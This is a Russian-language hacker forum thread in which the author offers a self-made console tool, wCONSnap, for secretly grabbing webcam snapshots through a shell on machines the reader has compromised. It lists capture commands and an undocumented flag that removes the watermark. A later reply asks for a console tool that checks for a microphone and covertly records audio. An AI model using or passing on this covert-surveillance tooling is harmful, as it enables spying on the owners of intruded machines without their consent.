Всем привет! Заметил что тут "некоторые" люди очень любят рутить чужие машины))) Прям как я... так вот, хочу с Вами поделиться одной из своих небольших самописных утилит. wCONSnap 0.8 (скачать wconsnap.zip - 299Кб ) Собственно это КОНСОЛЬНАЯ утилита для снятия снимков с любых видео/фото устройств, подключенных к ПК. Т.е., скажем, если мы имеем shell на машине, можем "смотреть" в подключенные на ней web-камеры и прочие устройства имеющие Still Image Device интерфейсы. Работать с программой достаточно просто. Например, вызываем ее с параметром "-devices": wconsnap.exe -devices И получаем пронумерованный список всех имеющихся устройств. Например: Found devices: 1. FlyTV Platinum33 mini 2. StudioPro 3. DDPlayCam 4. Look 320S 5. Mobiola Video Source Теперь можем получить снимок. Рассмотрим как это можно сделать. Скажем, нас интересует устройство Look 320S. Вот все команды, которые удовлетворят нашу "потребность": по имени: wconsnap.exe -capture "Look 320S" или по номеру: wconsnap.exe -capture 4 или, по любой подходящей маске (как у файлов): wconsnap.exe -capture Look* wconsnap.exe -capture "Look 320?" wconsnap.exe -capture "*320*" wconsnap.exe -capture "Look ???[A-Z]" В результате мы получим файл JPEG с именем содержащим текущую дату и время (в названии)... Соответственно (мало-ли кто не понял ), если программа запущена через shell - то файл будет на удалённой машине. В общем, всё это можно узнать набрав: wconsnap.exe -help или wconsnap.exe /? Вот собственно и все =) Сырцы по запросу, кому надо... хотя там интересного ничего нет, т.к. реализовано на основе DSPack (т.е. и сами можете сделать, не сложно =)) Все вопросы прошу сюда.
Забыл добавить: если вы обратите внимание на сделанный снимок, в правом-нижнем углу увидите текст, типа "дата время [имя устройства] by wCONSnap версия". Это так называемый "watermark". Убрать его можно, вызывая программу с параметром (прошу прощения, что не документированным) -nowatermark. Т.е.: wconsnap.exe -capture "устройство" -nowatermark Удачи!
Эм... порт использует драйвер устройства, который вызывает DirectX, который в свою очередь вызывает моя программа =) Так что встречный вопрос: зачем?
1) Файерволл блокирует программу. 2) Долго инициализируется до снимка "Есть подозрение, мил человек..." (с)
1) И что? А что блокирует? По какому поводу? Или просто так написал? ^^ 2) потому что ждет 4 секунды - рекомендуемая задержка для инициализации устройства. Будем ждать меньше - на некоторых устройствах (тормознутых) получим "чёрный квадрат малевича" или просто файл длинной 0 байт.
Просто так писать не стал бы. Файерволл блокирует выполнение программы. В сочетании с длительной работой (явно дольше 4-х секунд) наводит на мысль, что программа шлет полученные изображения в инет. При использовании программы на машине с внешним ip все работает, на внутренней - сообщает, что не может взаимодействовать с устройством. Ты скажи что да как...
Вы, извините, любите задавать вопросы, до конца не поняв что хотите спросить! Какая разница что за ip? Что за устройство, и что за DirectX - вот где разница. А что дольше 4-х секунд? Весть процесс? Естественно! Ведь ТОЛЬКО инициализация ЖДЕТ 4 секунды! И вообще, давайте уже не заставлять меня отвечать на подобную ерунду. Ей богу. Логи сетевого сниффера в студию, где моя программа ЧТО-ТО КУДА-ТО ШЛЕТ. Да и хоть сообщение фаерволла (неизвестного) увидеть-то можно? Или он такой секретный, что скрывает что он делает? Короче, советую впредь аргументировать подобные слова
Спасибо! Работаю! ))) Думаю завтра-послезавтра выложу с возможностью записи в avi и сжатием имеющимися в системе фильтрами! Самому надо )
никто незнает есть ли консольная прога для прослушки? просто проверяется на наличие микрофона и запускается звукозапись
Блин... ну что это значит-то? Что написала программа? Создались-ли файлы? Верно-ли указано устройство? Используется-ли оно еще чем-то одновременно? Что за ОС? Уф... хоть что-то)) А-то я так не могу... не зная что-да-как)))
вот тут вроде ответ(конкретно про эту камеру): http://forum.radeon.ru/viewtopic.php?t=21262 Либо дрова у этой камеры не дают работать, либо она выключена комбинацией клавиш, либо просто не пашет =) Я вот ни разу еще не видел ошибки на реально работающем устройстве.... но, спасибо за наводку! Попробую узнать по-больше... может что нарою..
Не стоит так кипятиться, я задал конкретные вопросы, в ответ же получаю бурю эмоций. Если нет желания отвечать, отвлекать не буду.
Эмоции вполне адекватные. А на мои вопросы, ты так и не ответил, заметь. А ведь они важные, т.к. только ответив на них можно прояснить ситуацию, а не запутывать ее. В итоге выглядит так: пришел, ляпнул, ушел. А смысл?
StAt1C привет, ну ждем ждем и нету( хоть напиши как обстоят дела, будет прога для записи видео или нет? сам понимаешь каково это ждать)))